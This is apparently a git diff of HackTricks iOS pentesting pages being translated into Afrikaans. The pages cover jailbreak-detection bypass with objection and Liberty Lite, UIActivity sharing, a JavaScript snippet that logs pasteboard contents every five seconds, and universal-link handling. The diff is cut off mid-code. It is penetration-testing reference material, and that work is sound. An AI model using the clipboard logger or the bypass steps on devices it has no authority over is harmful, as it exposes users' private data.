[**here**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**.** +**Meer inligting oor hoe om jailbreaking op te spoor** [**hier**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**.** -You can try to avoid this detections using **objection's** `ios jailbreak disable` +Jy kan probeer om hierdie opsporings te vermy deur gebruik te maak van die `ios jailbreak disable`-funksie van **objection**. -## **Jailbreak Detection Bypass** +## **Jailbreak-opsporingsverbygaan** -* You can try to avoid this detections using **objection's** `ios jailbreak disable` -* You could also install the tool **Liberty Lite** (https://ryleyangus.com/repo/). Once the repo is added, the app should appear in the ‘Search’ tab +* Jy kan probeer om hierdie opsporings te vermy deur gebruik te maak van die `ios jailbreak disable`-funksie van **objection**. +* Jy kan ook die hulpmiddel **Liberty Lite** installeer (https://ryleyangus.com/repo/). Sodra die repo bygevoeg is, behoort die toepassing in die 'Soek'-tabblad te verskyn. -## References +## Verwysings * [https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/](https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md b/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md index 82d9bc197..facbc78c0 100644 --- a/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md +++ b/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md @@ -1,82 +1,78 @@ -# iOS UIActivity Sharing +# iOS UIActivity-deling
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# UIActivity Sharing Simplified +# Vereenvoudigde UIActivity-deling -From iOS 6 onwards, third-party applications have been enabled to **share data** such as text, URLs, or images using mechanisms like AirDrop, as outlined in Apple's [Inter-App Communication guide](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3). This feature manifests through a system-wide _share activity sheet_ that surfaces upon interacting with the "Share" button. +Vanaf iOS 6 is derde-party-toepassings in staat gestel om **data te deel**, soos teks, URL's of afbeeldings, deur gebruik te maak van meganismes soos AirDrop, soos uiteengesit in Apple se [Inter-App Communication-gids](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3). Hierdie funksie manifesteer deur middel van 'n stelselwye _deelaktiwiteitsblad_ wat na vore kom wanneer die "Deel" knoppie geaktiveer word. -A comprehensive enumeration of all the built-in sharing options is available at [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). Developers may opt to exclude specific sharing options if they deem them unsuitable for their application. +'n Omvattende opsomming van al die ingeboude deelopsies is beskikbaar by [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). Ontwikkelaars kan opsioneel spesifieke deelopsies uitsluit as hulle dit ongeskik ag vir hul toepassing. -## **How to Share Data** +## **Hoe om Data te Deel** -Attention should be directed towards: +Aandag moet gegee word aan: -- The nature of the data being shared. -- The inclusion of custom activities. -- The exclusion of certain activity types. - -Sharing is facilitated through the instantiation of a `UIActivityViewController`, to which the items intended for sharing are passed. This is achieved by calling: +- Die aard van die gedeelde data. +- Die insluiting van aangepaste aktiwiteite. +- Die uitsluiting van sekere aktiwiteitstipes. +Deling word fasiliteer deur die instansiasie van 'n `UIActivityViewController`, waarin die items wat bedoel is om gedeel te word, oorgedra word. Dit word bereik deur die volgende te roep: ```bash $ rabin2 -zq Telegram\ X.app/Telegram\ X | grep -i activityItems 0x1000df034 45 44 initWithActivityItems:applicationActivities: ``` +Ontwikkelaars moet die `UIActivityViewController` noukeurig ondersoek vir die aktiwiteite en aangepaste aktiwiteite waarmee dit geïnisialiseer is, sowel as enige gespesifiseerde `excludedActivityTypes`. -Developers should scrutinize the `UIActivityViewController` for the activities and custom activities it's initialized with, as well as any specified `excludedActivityTypes`. +## **Hoe om Data te Ontvang** -## **How to Receive Data** +Die volgende aspekte is van kritieke belang wanneer data ontvang word: -The following aspects are crucial when receiving data: +- Die verklaring van **aangepaste dokumenttipes**. +- Die spesifikasie van **dokumenttipes wat die app kan oopmaak**. +- Die verifikasie van die **integriteit van die ontvangste data**. -- The declaration of **custom document types**. -- The specification of **document types the app can open**. -- The verification of the **integrity of the received data**. +Sonder toegang tot die bronkode kan 'n persoon steeds die `Info.plist` ondersoek vir sleutels soos `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations`, en `CFBundleDocumentTypes` om te verstaan watter tipes dokumente 'n app kan hanteer en verklaar. -Without access to the source code, one can still inspect the `Info.plist` for keys like `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations`, and `CFBundleDocumentTypes` to understand the types of documents an app can handle and declare. +'n Bondige gids oor hierdie sleutels is beskikbaar op [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i), wat die belangrikheid beklemtoon van die definieer en invoer van UTIs vir stelselwye herkenning en die assosiasie van dokumenttipes met jou app vir integrasie in die "Open met" dialoog. -A succinct guide on these keys is available on [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i), highlighting the importance of defining and importing UTIs for system-wide recognition and associating document types with your app for integration in the "Open With" dialogue. +## Dinamiese Toetsbenadering -## Dynamic Testing Approach +Om **aktiwiteite te toets** wat gestuur word, kan 'n persoon: -To test **sending activities**, one could: +- Inhaak op die `init(activityItems:applicationActivities:)` metode om die items en aktiwiteite wat gedeel word, vas te vang. +- Uitgeslote aktiwiteite identifiseer deur die `excludedActivityTypes` eienskap te onderskep. -- Hook into the `init(activityItems:applicationActivities:)` method to capture the items and activities being shared. -- Identify excluded activities by intercepting the `excludedActivityTypes` property. +Vir die **ontvang van items**, behels dit: -For **receiving items**, it involves: +- Om 'n lêer met die app te deel vanaf 'n ander bron (bv. AirDrop, e-pos) wat die "Open met..." dialoog uitlok. +- Om `application:openURL:options:` te onderskep, tesame met ander metodes wat geïdentifiseer is tydens statiese analise, om die app se reaksie waar te neem. +- Om gebrekkige lêers of fuzzing-tegnieke te gebruik om die robuustheid van die app te evalueer. -- Sharing a file with the app from another source (e.g., AirDrop, email) that prompts the "Open with..." dialogue. -- Hooking `application:openURL:options:` among other methods identified during static analysis to observe the app's response. -- Employing malformed files or fuzzing techniques to evaluate the app's robustness. - -## References +## Verwysings * [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-uipasteboard.md b/mobile-pentesting/ios-pentesting/ios-uipasteboard.md index bc2afeb33..8a41fbdfe 100644 --- a/mobile-pentesting/ios-pentesting/ios-uipasteboard.md +++ b/mobile-pentesting/ios-pentesting/ios-uipasteboard.md @@ -1,54 +1,51 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Data sharing within and across applications on iOS devices is facilitated by the [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard) mechanism, which is divided into two primary categories: +Data-deling binne en tussen programme op iOS-toestelle word gefasiliteer deur die [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard) meganisme, wat verdeel is in twee primêre kategorieë: -- **Systemwide general pasteboard**: This is used for sharing data with **any application** and is designed to persist data across device restarts and app uninstallations, a feature that has been available since iOS 10. -- **Custom / Named pasteboards**: These are specifically for data sharing **within an app or with another app** that shares the same team ID, and are not designed to persist beyond the life of the application process that creates them, following changes introduced in iOS 10. +- **Stelselwye algemene plakbord**: Dit word gebruik vir die deling van data met **enige toepassing** en is ontwerp om data te behou oor toestelherstarts en toepassingsverwyderings, 'n funksie wat beskikbaar is sedert iOS 10. +- **Aangepaste / Genoemde plakborde**: Hierdie is spesifiek vir die deling van data **binne 'n toepassing of met 'n ander toepassing** wat dieselfde span-ID deel, en is nie ontwerp om te behou buite die leeftyd van die toepassingsproses wat dit skep nie, volgens veranderinge wat in iOS 10 ingevoer is. -**Security considerations** play a significant role when utilizing pasteboards. For instance: -- There is no mechanism for users to manage app permissions to access the **pasteboard**. -- To mitigate the risk of unauthorized background monitoring of the pasteboard, access is restricted to when the application is in the foreground (since iOS 9). -- The use of persistent named pasteboards is discouraged in favor of shared containers due to privacy concerns. -- The **Universal Clipboard** feature introduced with iOS 10, allowing content to be shared across devices via the general pasteboard, can be managed by developers to set data expiration and disable automatic content transfer. +**Veiligheidsoorwegings** speel 'n belangrike rol wanneer plakborde gebruik word. Byvoorbeeld: +- Daar is geen meganisme vir gebruikers om toepassingstoestemming om die **plakbord** te gebruik, te bestuur nie. +- Om die risiko van ongemagtigde agtergrondmonitering van die plakbord te verminder, is toegang beperk tot wanneer die toepassing in die voorgrond is (sedert iOS 9). +- Die gebruik van volhoubare genoemde plakborde word afgeraai ten gunste van gedeelde houers as gevolg van privaatheidskwessies. +- Die **Universele Knipbord**-funksie wat met iOS 10 bekendgestel is en dit moontlik maak om inhoud oor toestelle te deel via die algemene plakbord, kan deur ontwikkelaars bestuur word om data-verval en outomatiese inhoudsoordrag te deaktiveer. -Ensuring that **sensitive information is not inadvertently stored** on the global pasteboard is crucial. Additionally, applications should be designed to prevent the misuse of global pasteboard data for unintended actions, and developers are encouraged to implement measures to prevent copying of sensitive information to the clipboard. +Dit is belangrik om te verseker dat **sensitiewe inligting nie per ongeluk op die globale plakbord gestoor word nie**. Daarbenewens moet toepassings ontwerp word om die misbruik van globale plakborddata vir onbedoelde aksies te voorkom, en ontwikkelaars word aangemoedig om maatreëls te implementeer om die kopieer van sensitiewe inligting na die knipbord te voorkom. -### Static Analysis +### Statische Analise -For static analysis, search the source code or binary for: -- `generalPasteboard` to identify usage of the **systemwide general pasteboard**. -- `pasteboardWithName:create:` and `pasteboardWithUniqueName` for creating **custom pasteboards**. Verify if persistence is enabled, though this is deprecated. +Vir statiese analise, soek die bronkode of binêre kode vir: +- `generalPasteboard` om die gebruik van die **stelselwye algemene plakbord** te identifiseer. +- `pasteboardWithName:create:` en `pasteboardWithUniqueName` om **aangepaste plakborde** te skep. Verifieer of volhoubaarheid geaktiveer is, alhoewel dit verouderd is. -### Dynamic Analysis +### Dinamiese Analise -Dynamic analysis involves hooking or tracing specific methods: -- Monitor `generalPasteboard` for system-wide usage. -- Trace `pasteboardWithName:create:` and `pasteboardWithUniqueName` for custom implementations. -- Observe deprecated `setPersistent:` method calls to check for persistence settings. +Dinamiese analise behels die hake of naspeur van spesifieke metodes: +- Monitor `generalPasteboard` vir stelselwye gebruik. +- Volg `pasteboardWithName:create:` en `pasteboardWithUniqueName` vir aangepaste implementasies. +- Neem kennis van verouderde `setPersistent:` metode-oproepe om volhoubaarheidsinstellings te kontroleer. -Key details to monitor include: -- **Pasteboard names** and **contents** (for instance, checking for strings, URLs, images). -- **Number of items** and **data types** present, leveraging standard and custom data type checks. -- **Expiry and local-only options** by inspecting the `setItems:options:` method. +Sleutelbesonderhede om dop te hou, sluit in: +- **Plakbordname** en **inhoud** (byvoorbeeld deur te kyk vir strings, URL's, afbeeldings). +- **Aantal items** en **datatipes** teenwoordig, deur gebruik te maak van standaard- en aangepaste datatipekontroles. +- **Verval- en slegs-plaaslike opsies** deur die `setItems:options:` metode te ondersoek. -An example of monitoring tool usage is **objection's pasteboard monitor**, which polls the generalPasteboard every 5 seconds for changes and outputs the new data. - -Here's a simple JavaScript script example, inspired by the objection's approach, to read and log changes from the pasteboard every 5 seconds: +'n Voorbeeld van die gebruik van 'n moniteringsinstrument is die **objection se plakbordmoniter**, wat elke 5 sekondes die generalPasteboard ondervra vir veranderinge en die nuwe data uitvoer. +Hier is 'n eenvoudige JavaScript-skripsievoorbeeld, geïnspireer deur die benadering van objection, om elke 5 sekondes veranderinge van die plakbord te lees en te log: ```javascript const UIPasteboard = ObjC.classes.UIPasteboard; const Pasteboard = UIPasteboard.generalPasteboard(); @@ -56,24 +53,23 @@ var items = ""; var count = Pasteboard.changeCount().toString(); setInterval(function () { - const currentCount = Pasteboard.changeCount().toString(); - const currentItems = Pasteboard.items().toString(); +const currentCount = Pasteboard.changeCount().toString(); +const currentItems = Pasteboard.items().toString(); - if (currentCount === count) { return; } +if (currentCount === count) { return; } - items = currentItems; - count = currentCount; +items = currentItems; +count = currentCount; - console.log('[* Pasteboard changed] count: ' + count + - ' hasStrings: ' + Pasteboard.hasStrings().toString() + - ' hasURLs: ' + Pasteboard.hasURLs().toString() + - ' hasImages: ' + Pasteboard.hasImages().toString()); - console.log(items); +console.log('[* Pasteboard changed] count: ' + count + +' hasStrings: ' + Pasteboard.hasStrings().toString() + +' hasURLs: ' + Pasteboard.hasURLs().toString() + +' hasImages: ' + Pasteboard.hasImages().toString()); +console.log(items); }, 1000 * 5); ``` - -## References +## Verwysings * [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8) * [https://hackmd.io/@robihamanto/owasp-robi](https://hackmd.io/@robihamanto/owasp-robi) @@ -81,16 +77,14 @@ setInterval(function () {
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-universal-links.md b/mobile-pentesting/ios-pentesting/ios-universal-links.md index f04fea69d..49cecb014 100644 --- a/mobile-pentesting/ios-pentesting/ios-universal-links.md +++ b/mobile-pentesting/ios-pentesting/ios-universal-links.md @@ -1,101 +1,95 @@ -# iOS Universal Links +# iOS Universele Skakels
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Introduction +## Inleiding -Universal links offer a **seamless redirection** experience to users by directly opening content in the app, bypassing the need for Safari redirection. These links are **unique** and secure, as they cannot be claimed by other apps. This is ensured by hosting a `apple-app-site-association` JSON file on the website's root directory, establishing a verifiable link between the website and the app. In cases where the app is not installed, Safari will take over and direct the user to the webpage, maintaining the app's presence. +Universele skakels bied 'n **naadlose omleidingservaring** aan gebruikers deur inhoud direk in die app te open, sonder die nodigheid van Safari-omleiding. Hierdie skakels is **uniek** en veilig, aangesien dit nie deur ander apps geclaim kan word nie. Dit word verseker deur 'n `apple-app-site-association` JSON-lêer op die webwerf se hoofgids te hê, wat 'n verifieerbare skakel tussen die webwerf en die app vestig. In gevalle waar die app nie geïnstalleer is nie, sal Safari oorneem en die gebruiker na die webblad lei, terwyl die app teenwoordig bly. -For penetration testers, the `apple-app-site-association` file is of particular interest as it may reveal **sensitive paths**, potentially including ones related to unreleased features. +Vir penetrasietoetsers is die `apple-app-site-association`-lêer van besondere belang, aangesien dit moontlik **sensitiewe paaie** kan onthul, moontlik insluitend paaie wat verband hou met onvrygestelde funksies. -### **Analyzing the Associated Domains Entitlement** - -Developers enable Universal Links by configuring the **Associated Domains** in Xcode's Capabilities tab or by inspecting the `.entitlements` file. Each domain is prefixed with `applinks:`. For example, Telegram's configuration might appear as follows: +### **Ontleding van die Verwante Domeine Toekenning** +Ontwikkelaars aktiveer Universele Skakels deur die **Verwante Domeine** te konfigureer in Xcode se Vermoëns-tabblad of deur die `.entitlements`-lêer te ondersoek. Elke domein word voorafgegaan deur `applinks:`. Byvoorbeeld, Telegram se konfigurasie kan soos volg lyk: ```xml - com.apple.developer.associated-domains - - applinks:telegram.me - applinks:t.me - +com.apple.developer.associated-domains + +applinks:telegram.me +applinks:t.me + ``` +Vir meer omvattende insigte, verwys na die [geargiveerde Apple Developer-dokumentasie](https://developer.apple.com/library/archive/documentation/General/Conceptual/AppSearch/UniversalLinks.html#//apple_ref/doc/uid/TP40016308-CH12-SW2). -For more comprehensive insights, refer to the [archived Apple Developer Documentation](https://developer.apple.com/library/archive/documentation/General/Conceptual/AppSearch/UniversalLinks.html#//apple_ref/doc/uid/TP40016308-CH12-SW2). +As jy werk met 'n saamgestelde toepassing, kan toekennings soos uiteengesit in [hierdie gids](extracting-entitlements-from-compiled-application.md) onttrek word. -If working with a compiled application, entitlements can be extracted as outlined in [this guide](extracting-entitlements-from-compiled-application.md). +### **Die Apple App Site Association-lêer ophaal** -### **Retrieving the Apple App Site Association File** +Die `apple-app-site-association`-lêer moet van die bediener afgehaal word deur die domeine wat in die toekennings gespesifiseer is. Maak seker dat die lêer direk toeganklik is via HTTPS by `https:///apple-app-site-association`. Hulpmiddels soos die [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/) kan help met hierdie proses. -The `apple-app-site-association` file should be retrieved from the server using the domains specified in the entitlements. Ensure the file is accessible via HTTPS directly at `https:///apple-app-site-association`. Tools like the [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/) can aid in this process. +### **Hantering van Universele Skakels in die Toepassing** -### **Handling Universal Links in the App** +Die toepassing moet spesifieke metodes implementeer om universele skakels korrek te hanteer. Die primêre metode om na te kyk is [`application:continueUserActivity:restorationHandler:`](https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1623072-application). Dit is noodsaaklik dat die skema van die behandelde URL's HTTP of HTTPS is, aangesien ander nie ondersteun sal word nie. -The app must implement specific methods to handle universal links correctly. The primary method to look for is [`application:continueUserActivity:restorationHandler:`](https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1623072-application). It's crucial that the scheme of URLs handled is HTTP or HTTPS, as others will not be supported. - -#### **Validating the Data Handler Method** - -When a universal link opens an app, an `NSUserActivity` object is passed to the app with the URL. Before processing this URL, it's essential to validate and sanitize it to prevent security risks. Here's an example in Swift that demonstrates the process: +#### **Validasie van die Data Handler-metode** +Wanneer 'n universele skakel 'n toepassing oopmaak, word 'n `NSUserActivity`-voorwerp na die toepassing gestuur saam met die URL. Voordat hierdie URL verwerk word, is dit noodsaaklik om dit te valideer en te saniteer om sekuriteitsrisiko's te voorkom. Hier is 'n voorbeeld in Swift wat die proses demonstreer: ```swift func application(_ application: UIApplication, continue userActivity: NSUserActivity, - restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool { - // Check for web browsing activity and valid URL - if userActivity.activityType == NSUserActivityTypeBrowsingWeb, let url = userActivity.webpageURL { - application.open(url, options: [:], completionHandler: nil) - } +restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool { +// Check for web browsing activity and valid URL +if userActivity.activityType == NSUserActivityTypeBrowsingWeb, let url = userActivity.webpageURL { +application.open(url, options: [:], completionHandler: nil) +} - return true +return true } ``` - -URLs should be carefully parsed and validated, especially if they include parameters, to guard against potential spoofing or malformed data. The `NSURLComponents` API is useful for this purpose, as demonstrated below: - +URL's moet sorgvuldig geparseer en gevalideer word, veral as dit parameters bevat, om te voorkom dat potensiële vervalsing of verkeerde data plaasvind. Die `NSURLComponents` API is nuttig vir hierdie doel, soos hieronder gedemonstreer: ```swift func application(_ application: UIApplication, - continue userActivity: NSUserActivity, - restorationHandler: @escaping ([Any]?) -> Void) -> Bool { - guard userActivity.activityType == NSUserActivityTypeBrowsingWeb, - let incomingURL = userActivity.webpageURL, - let components = NSURLComponents(url: 